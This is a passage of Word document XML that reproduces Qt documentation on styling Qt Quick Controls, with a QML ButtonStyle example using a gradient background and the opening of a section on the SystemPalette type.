          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId539" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ButtonStyle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId540" w:history="1">
        <w:r w:rsidRPr="00C76116">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Menu</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId541" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MenuStyle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type. The styling types provide properties applicable to their respective controls such as the background, label, or for some controls, the cursor appearance.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w: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text</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qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Hello World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</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style</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ButtonStyle</w:t>
      </w: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background</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w: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implicitWidth</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>100</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implicitHeight</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>25</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border</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width</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control</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activeFocus </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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w: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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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border</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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#FFF"</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radius</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</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gradient</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gradient</w:t>
      </w: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p>
    <w:p w:rsidR="00C76116" w:rsidRPr="004375A9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GradientStop</w:t>
      </w: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position</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w: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color</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control</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pressed </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4375A9">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#ccc"</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#fff"</w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004375A9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GradientStop</w:t>
      </w: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position</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w: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color</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control</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pressed </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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#000"</w:t>
      </w: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r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"#fff"</w:t>
      </w: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p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">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p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId542" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Controls Styles</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>was introduced in Qt 5.1 and requires</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId543" w:history="1">
        <w:r w:rsidRPr="00C76116">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C21832">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="713" w:name="accessing-the-system-palette"/>
      <w:bookmarkStart w:id="714" w:name="_Toc483000682"/>
      <w:bookmarkStart w:id="715" w:name="_Toc483003699"/>
      <w:bookmarkStart w:id="716" w:name="_Toc483604034"/>
      <w:bookmarkStart w:id="717" w:name="_Toc483605254"/>
      <w:bookmarkEnd w:id="713"/>
      <w:r w:rsidRPr="00C21832">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessing the System Palette</w:t>
      </w:r>
      <w:bookmarkEnd w:id="714"/>
      <w:bookmarkEnd w:id="715"/>
      <w:bookmarkEnd w:id="716"/>
      <w:bookmarkEnd w:id="717"/>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId544" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SystemPalette</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type provides information about the system's palette information. QML applications can use this information to set the appearance of visual types </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to match the native look-and-feel</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In addition, on</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId545" w:anchor="desktop-platforms" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>desktop</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00242E0B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>platforms</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, different color palettes are employed when changing states, for example, when the application loses keyboard focus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId546" w:history="1">
        <w:r w:rsidRPr="00242E0B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>controls</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C76116">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the system colors are already used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C76116" w:rsidRPr="00C76116" w:rsidRDefault="00C76116" w:rsidP="00C76116">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
